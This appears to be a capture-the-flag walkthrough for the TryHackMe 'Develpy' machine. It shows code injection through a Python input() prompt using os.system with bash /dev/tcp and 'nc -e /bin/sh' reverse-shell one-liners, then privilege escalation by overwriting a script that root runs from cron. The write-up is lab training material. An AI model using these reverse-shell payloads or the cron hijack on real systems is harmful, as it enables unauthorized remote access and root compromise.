THM - Develpy
boot2root machine for FIT and bsides Guatemala CTF.
Not much to go on here. This one is Medium rated. Let’s begin.
Nmap says we’ve got two ports only - SSH on 22 and a mystery port on 10000.
Visiting port 10000 in Firefox presents the following message:
Private 0days
Please enter number of exploits to send??: Traceback (most recent call last): File “./”, line 6, innum_exploits = int(input(' Please enther number of exploits to send??: ')) File " ", line 1, in NameError: name 'GET' is not defined
So it looks like a python application of some sort that we don’t interact with via a brower. We’ll move on to netcat.
root@kali:/opt/tryhackme/develpy# nc 10000
Private 0days
Please enther number of exploits to send??: 1
Exploit started, attacking target (
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.011 ms
So what’s going on here is we enter some number, and we get that number of pings. Now we have to break it.
Breaking it
I tried a few different things; some things produce this message as part of the error:
num_exploits = int(input(‘ Please enther number of exploits to send??: ‘))
So we can see the value being input being cast to an integer with int - actually we saw this earlier when we visited the port in the browser. Trying a few different data types produces more error messages, indicating it wants a string or integer as the expected input. After a bit I tried this:
__import__('os').system('bash -i >& /dev/tcp/ 0>&1')#
Which prompted this error:
sh: 1: Syntax error: Bad fd number
And this indicated that the command was being executed by the system but not being understood (using sh not bash). The next one I tried was:
__import__('os').system('nc -e /bin/sh 1234')
And I was on the box.
On the box
Our user is called king. Checking /etc/crontab we can see:
- root cd /home/king/ && bash
So we have root running a script in our home directory. Nice. We can overwrite the script with our own - I deleted the original and replaced it:
king@ubuntu:~$ echo '#!/bin/bash' >>
king@ubuntu:~$ echo 'nc -e /bin/sh 1235' >>
Since we know this shell already works, we might as well user it again with a different port number, right? With a new listener we get a root shell and it’s all done; thanks for playing.